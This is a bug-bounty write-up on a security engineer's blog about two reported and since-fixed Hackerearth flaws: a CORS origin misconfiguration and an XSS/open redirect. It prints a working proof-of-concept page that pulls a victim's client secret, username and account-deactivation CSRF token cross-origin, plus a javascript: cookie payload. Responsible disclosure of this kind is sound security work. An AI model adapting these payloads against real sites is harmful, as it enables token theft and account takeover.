./dr3dd

Application Security Engineer

Blogs

About

Resume

CVE's

GitHunt

A Hilarious Journey into the Mischief of Hackerearth - Unveiling Secrets and XSS Shenanigans

by on under Bug-Bounty
5 minute read

Introduction:

Greetings, fellow adventurers of the digital realm! Today, we embark on a captivating journey through the whimsical domain of Hackerearth, where two mischievous bugs await our discovery. Join me as we unravel the secrets and witness the amusing dance of Cross-Origin Misconfiguration and XSS/Open Redirect vulnerabilities. Hold onto your hats and prepare for a wild ride!

Part 1: Cross-Origin Misconfiguration - The Quirky Dance of Origins

Our adventure begins with the enchanting Cross-Origin Misconfiguration dance at Hackerearth. By cleverly changing the origin header in our request, we discovered a delightful misconfiguration that triggered unexpected responses. The backend’s regex, designed to validate the origin, had a peculiar blind spot—only checking for www.hackerearth.com after https://. Leveraging this vulnerability, we summoned a subdomain, www.hackerearth.com.dr3dd.live, and unleashed our small JavaScript script, slyly stealing secret tokens from unsuspecting victims. Oh, the allure of those secrets!

<!DOCTYPE html>
<html>
<body>

<div>
<h1>Getting hackerearth Client secrets for victim!!!</h1>
<button type="button" onclick="loadDoc()">Get secrets!!!</button>
  <div id="demo1"></div>
  <div id="demo2"></div>
  <div id="demo3"></div>
<button type="button" onclick="get_csrf_token()">You can get any csrf token and make changes in victim account like this is account deactivate csrf token!!!</button>
  <div id="demo4"></div>
</div>

<script>
function loadDoc() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
        var parser=new DOMParser();
        var xmlDoc=parser.parseFromString(this.responseText, "text/html").documentElement;
        var clientId = xmlDoc.querySelector('#client-id');
        var clientSecret = xmlDoc.querySelector('#client-secret');
        var username = xmlDoc.querySelector('#change-username');
        document.getElementById("demo1").innerHTML = clientId.innerText;
        document.getElementById("demo2").innerHTML = clientSecret.innerText;
        document.getElementById("demo3").innerHTML = username.innerText.replace('Edit','');;
        
    }
  };
  xhttp.open("GET", "https://www.hackerearth.com/users/profile-settings/", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
function get_csrf_token(){
  var xhttp = new XMLHttpRequest();
    xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
        var parser=new DOMParser();
        var xmlDoc= parser.parseFromString(this.responseText, "text/html").documentElement;
        var csrf = xmlDoc.querySelector('#deactivate-form')[0].value;
      document.getElementById("demo4").innerHTML = "csrf for deactivate account : " + csrf;
    }
  };
  var username = document.getElementById("demo3").innerText;
  var url = "https://www.hackerearth.com/deactivate/" + username.replace("Username: ","");;
  xhttp.open("GET", url, true);
  xhttp.withCredentials = true;
  xhttp.send();
}
  
  
</script>

</body>
</html>

Part 2: XSS/Open Redirect - The Dazzling Duo of Exploits

As we delve deeper into the realm of Hackerearth, we stumble upon the dynamic duo of XSS and Open Redirect vulnerabilities. With a few clever maneuvers, we unveiled a fascinating trick. By tampering with the redirect parameter, we discovered an open door to mischief. In a delightful twist, we managed to execute JavaScript code, allowing us to access cookies and reveal the inner workings of Hackerearth. The power to extract secrets through a simple URL manipulation is both amusing and enlightening.

https://www.hackerearth.com/social-login-complete-page/?redirect=javascript:alert(document.cookie)

Conclusion: A Dance of Fixes and Lessons

Our adventure through the amusing world of Hackerearth comes to a close, but the journey has left us with valuable insights. Although these vulnerabilities provided us with laughter and intrigue, it is crucial to remember the importance of fixing them. While the cross-origin misconfiguration has been rectified, the open redirect vulnerability still awaits a resolution.

Let us embark on our own quest to bolster cybersecurity defenses. May we embrace the whimsy of the digital world while diligently patching vulnerabilities, ensuring a safer online realm for all. And with that, dear adventurers, go forth and spread laughter, knowledge, and secure coding practices to all corners of the digital landscape!

[Note: The bugs mentioned in this blog have been reported to Hackerearth for appropriate action and resolution.]

[Disclaimer: The purpose of this blog is to entertain and educate about the importance of cybersecurity. Please refrain from attempting any malicious activities or exploiting vulnerabilities without proper authorization.]

Timeline

  1. March-16-2020 Submit report to hackerearth via mail
  2. March-18-2020 Submit Detail POC for bugs
  3. March-27-2020 1st bug Core misconfiguration is fixed.
  4. April-18-2020 Asked for update but they said they still working on fix.
  5. Jan-02-2021 XSS is fixed.
  6. April-16-2021 Acknowledged and rewarded swag.
Bug-Bounty
comments powered by Disqus